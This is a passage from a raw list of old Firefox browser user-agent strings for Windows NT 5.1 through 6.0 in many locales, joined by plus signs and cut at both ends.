Windows NT 5.1; it; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 (.NET CLR 3.5.30729; .NET4.0E) +Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9b2) Gecko/2007121120 Firefox/3.0b2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5 +Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.8.0.10) Gecko/20070216 Firefox/1.5.0.10 +Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.8.0.9) Gecko/20061206 Firefox/1.5.0.9 +Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17 +Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5 +Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 GTB7.0 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 GTB7.0 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.2.25) Gecko/20111212 Firefox/3.6.25 (.NET CLR 3.5.30729; .NET4.0C) +Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.2a1pre) Gecko/20090402 Firefox/3.6a1pre (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5 +Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12 +Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16 (.NET CLR 3.5.30729; .NET4.0E) +Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9.2.4) Gecko/20100523 Firefox/3.6.4 +Mozilla/5.0 (Windows; U; Windows NT 5.1; lt; rv:1.9b4) Gecko/2008030714 Firefox/3.0b4 +Mozilla/5.0 (Windows; U; Windows NT 5.1; nb-NO; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.6) Gecko/20050318 Firefox/1.0.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11 +Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12 +Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9b4) Gecko/2008030714 Firefox/3.0b4 +Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11 +Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.8.0.9) Gecko/20061206 Firefox/1.5.0.9 +Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17 +Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.8.1.1) Gecko/20061204 Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1) Gecko/20060918 Firefox/2.0b2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 GTB6 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.0.9) Gecko/20061206 Firefox/1.5.0.9 +Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15 +Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 +Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 +Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 GTB6 +Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.1.11) Gecko/20100701 Firefox/3.5.11 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.2.7) Gecko/20100713 Firefox/3.6.7 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; ro-RO; rv:1.7.6) Gecko/20050318 Firefox/1.0.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; ro; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv:1.7.7) Gecko/20050414 Firefox/1.0.3 +Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8 +Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.12) Gecko/20100824 MRA 5.7 (build 03755) Firefox/3.5.12 +Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 +Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.7 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9b3) Gecko/2008020514 Firefox/3.0b3 +Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:15.0) Gecko/20121011 Firefox/15.0.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.7.3) Gecko/20040911 Firefox/0.10.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.7.3) Gecko/20040913 Firefox/0.10 +Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.7.3) Gecko/20040913 Firefox/0.10.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.7.3) Gecko/20041001 Firefox/0.10.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9 +Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; sv-SE; rv:1.7.6) Gecko/20050318 Firefox/1.0.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; sv-SE; rv:1.8.0.10) Gecko/20070216 Firefox/1.5.0.10 +Mozilla/5.0 (Windows; U; Windows NT 5.1; sv-SE; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12 +Mozilla/5.0 (Windows; U; Windows NT 5.1; sv-SE; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; sv-SE; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17 +Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.8.0.9) Gecko/20061206 Firefox/1.5.0.9 +Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9 +Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.8b5) Gecko/20051006 Firefox/1.4.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17 +Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 (.NET CLR 3.5.30729; .NET4.0E) +Mozilla/5.0 (Windows; U; Windows NT 5.1; tr-TR; rv:1.7.6) Gecko/20050321 Firefox/1.0.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; uk; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.8.0.9) Gecko/20061206 Firefox/1.5.0.9 +Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.17 +Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18 +Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 +Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9 +Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 +Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.4) Gecko/20100503 Firefox/3.6.4 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.4) Gecko/20100513 Firefox/3.6.4 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 +Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9b3) Gecko/2008020514 Firefox/3.0b3 +Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9b4) Gecko/2008030714 Firefox/3.0b4 +Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.7.5) Gecko/20041119 Firefox/1.0 +Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 GTB6 +Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4 GTB7.0 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9b4) Gecko/2008030714 Firefox/3.0b4 +Mozilla/5.0 (Windows; U; Windows NT 5.2; da; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9 +Mozilla/5.0 (Windows; U; Windows NT 5.2; de-DE; rv:1.7.6) Gecko/20050321 Firefox/1.0.2 +Mozilla/5.0 (Windows; U; Windows NT 5.2; de; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-CA; rv:1.9.2.4) Gecko/20100523 Firefox/3.6.4 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-GB; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-GB; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-GB; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.9) Gecko/20061206 Firefox/1.5.0.9 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8b5) Gecko/20051006 Firefox/1.4.1 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.4) Gecko/20091007 Firefox/3.5.4 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1b3pre) Gecko/20090105 Firefox/3.1b3pre +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20 (.NET CLR 3.5.30729; .NET4.0E) +Mozilla/5.0 (Windows; U; Windows NT 5.2; fr; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.0.04506.648) +Mozilla/5.0 (Windows; U; Windows NT 5.2; fr; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5 +Mozilla/5.0 (Windows; U; Windows NT 5.2; nl; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7 +Mozilla/5.0 (Windows; U; Windows NT 5.2; nl; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5 +Mozilla/5.0 (Windows; U; Windows NT 5.2; ru; rv:1.9.2.11) Gecko/20101012 Firefox/3.6.11 +Mozilla/5.0 (Windows; U; Windows NT 5.2; rv:1.7.3) Gecko/20041001 Firefox/0.10.1 +Mozilla/5.0 (Windows; U; Windows NT 5.2; rv:1.9.2.11) Gecko/20101012 Firefox/3.6.11 +Mozilla/5.0 (Windows; U; Windows NT 5.2; rv:1.9.2) Gecko/20100101 Firefox/3.6 +Mozilla/5.0 (Windows; U; Windows NT 5.2; sk; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15 +Mozilla/5.0 (Windows; U; Windows NT 5.2 x64; en-US; rv:1.9a1) Gecko/20060214 Firefox/1.6a1 +Mozilla/5.0 (Windows; U; Windows NT 5.2; zh-CN; rv:1.9.1.5) Gecko/Firefox/3.5.5 +Mozilla/5.0 (Windows; U; Windows NT 5.2; zh-TW; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 +Mozilla/5.0 (Windows; U; Windows NT 6.0; bg; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; cs; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 +Mozilla/5.0 (Windows; U; Windows NT 6.0; cs; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 +Mozilla/5.0 (Windows; U; Windows NT 6.0; cs; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 +Mozilla/5.0 (Windows; U; Windows NT 6.0; de-AT; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2 +Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13 +Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5 +Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7 +Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9 +Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 (.NET CLR 4.0.20506) +Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.0.15) Gecko/2009101601 Firefox 2.1 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.2) Gecko/20090729 Firefox/2.0.0.15 +Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 +Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 GTB7.0 (.NET CLR 3.0.30618) +Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 +Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.13) Gecko/20101203 Firefox/3.5.9 (de) +Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.19 +Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20 +Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.19 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729) FirePHP/0.3 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 GTB5 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 GTB5 (.NET CLR 4.0.20506) +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.2.15) Gecko/20110303 AskTbBT4/3.11.3.15590 Firefox/3.6.15 (.NET CLR 3.5.30729; .NET4.0C) +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 (.NET CLR 3.5.30729; .NET4.0E) +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.2.24) Gecko/20111103 Firefox/3.6.24 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9 (.NET CLR 3.5.30729; .NET CLR 4.0.20506) +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.10pre) Gecko/20070207 Firefox/1.5.0.10pre +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.9) Gecko/20061206 Firefox/1.5.0.9 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.17 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.17 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; en_US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.7 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1b2) Gecko/20060821 Firefox/2.0b2 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12 GTB5 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.5.12 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.16) Gecko/20101130 MRA 5.4 (build 02647) Firefox/3.5.16 (.NET CLR 3.5.30729; .NET4.0C) +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727; .NET CLR 3.0.30618; .NET CLR 3.5.21022; .NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 MRA 5.4 (build 02647) Firefox/3.5.6 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729) FirePHP/0.4 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1b2) Gecko/20081127 Firefox/3.1b1 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1b3) Gecko/20090405 Firefox/3.1b3 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 GTB5 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 (.NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET CLR 3.5.21022) +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.4) Gecko/20100513 Firefox/3.6.4 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.4) Gecko/20100523 Firefox/3.6.4 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.4) Gecko/20100527 Firefox/3.6.4 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.4) Gecko/20100527 Firefox/3.6.4 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9b3) Gecko/2008020514 Firefox/3.0b3 +Mozilla/5.0 (Windows; U; Windows NT 6.0; es-AR; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 +Mozilla/5.0 (Windows; U; Windows NT 6.0; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.13 +Mozilla/5.0 (Windows; U; Windows NT 6.0; es-ES; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16 +Mozilla/5.0 (Windows; U; Windows NT 6.0; es-ES; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 GTB5 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; es-MX; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 +Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16 +Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7 +Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.9.1b1) Gecko/20081007 Firefox/3.1b1 +Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 +Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 +Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.9.2.4) Gecko/20100523 Firefox/3.6.4 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5 +Mozilla/5.0 (Windows; U; Windows NT 6.0; hu; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20 +Mozilla/5.0 (Windows; U; Windows NT 6.0; id; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; it-IT; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7 +Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9 +Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.1.16) Gecko/20101130 Firefox/3.5.16 GTB7.1 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2 +Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16 +Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1.8.1.20) Gecko/20081217 